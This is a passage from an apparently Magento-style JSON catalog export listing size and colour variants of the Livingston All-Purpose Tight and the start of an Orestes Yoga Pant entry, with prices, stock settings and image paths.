All-Purpose Tight-33-Red\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"788\":{\"sku\":\"MP09-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-34-Black\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"789\":{\"sku\":\"MP09-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-34-Blue\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"790\":{\"sku\":\"MP09-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-34-Red\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"791\":{\"sku\":\"MP09-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-36-Black\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"792\":{\"sku\":\"MP09-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-36-Blue\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"793\":{\"sku\":\"MP09-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight-36-Red\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"livingston-all-purpose-tight-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"794\":{\"sku\":\"MP09\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Livingston All-Purpose Tight\",\"description\":\"<p>It\'s not often that your pants work as a yoga staple and a climbing buddy. The Livingston All-Purpose Tight is made with soft, 11% cotton and nylon polymer stretch construction that lets you find the right angle in the studio or on the mountain side.<\\/p>\\n<p>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Compression fit<br \\/>&bull; Hidden key pocket<br \\/>&bull; Elastic waist with internal drawcord.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Sweatpants|Base Layer|Compression|Track Pants|Leggings,material=CoolTech&trade;|Fleece|Polyester|Rayon,pattern=Solid,climate=All-weather|Cold|Cool|Windy|Wintry,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP09-32-Black,size=32,color=Black|sku=MP09-32-Blue,size=32,color=Blue|sku=MP09-32-Red,size=32,color=Red|sku=MP09-33-Black,size=33,color=Black|sku=MP09-33-Blue,size=33,color=Blue|sku=MP09-33-Red,size=33,color=Red|sku=MP09-34-Black,size=34,color=Black|sku=MP09-34-Blue,size=34,color=Blue|sku=MP09-34-Red,size=34,color=Red|sku=MP09-36-Black,size=36,color=Black|sku=MP09-36-Blue,size=36,color=Blue|sku=MP09-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"image\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp09-blue_alt1.jpg,\\/m\\/p\\/mp09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Sweatpants|Base Layer|Compression|Track Pants|Leggings\",\"material\":\"CoolTech&trade;|Fleece|Polyester|Rayon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cold|Cool|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"795\":{\"sku\":\"MP10-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -32-Black\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 